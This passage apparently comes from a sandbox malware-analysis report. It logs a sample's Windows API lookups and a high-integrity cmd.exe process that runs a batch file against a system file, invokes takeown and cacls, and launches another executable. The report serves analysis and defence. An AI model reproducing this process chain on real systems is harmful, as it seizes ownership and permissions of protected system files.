|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:03 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #114: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #114 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:24, Reason: Child Process |
| Unmonitor | End Time: 00:03:20, Reason: Self Terminated |
| Monitor Duration | 00:00:56 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x85c |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
2E8
0x
C8C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000e70000 | 0x00e70000 | 0x04e6ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004e70000 | 0x04e70000 | 0x04e8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e70000 | 0x04e70000 | 0x04e7ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004e80000 | 0x04e80000 | 0x04e83fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e90000 | 0x04e90000 | 0x04e91fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e90000 | 0x04e90000 | 0x04e93fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ea0000 | 0x04ea0000 | 0x04eb3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ec0000 | 0x04ec0000 | 0x04efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f00000 | 0x04f00000 | 0x04ffffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005000000 | 0x05000000 | 0x05003fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005010000 | 0x05010000 | 0x05010fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005020000 | 0x05020000 | 0x05021fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x05030000 | 0x050edfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000050f0000 | 0x050f0000 | 0x050fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005110000 | 0x05110000 | 0x0511ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005120000 | 0x05120000 | 0x0522ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005230000 | 0x05230000 | 0x0526ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005270000 | 0x05270000 | 0x0536ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005370000 | 0x05370000 | 0x0555ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05560000 | 0x05896fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eec0000 | 0x7eec0000 | 0x7efbffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007efc0000 | 0x7efc0000 | 0x7efe2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efe6000 | 0x7efe6000 | 0x7efe8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe9000 | 0x7efe9000 | 0x7efe9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efeb000 | 0x7efeb000 | 0x7efedfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efee000 | 0x7efee000 | 0x7efeefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 79 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 22 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 240, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x45c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xd70, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xda0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "WinMail.exe.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
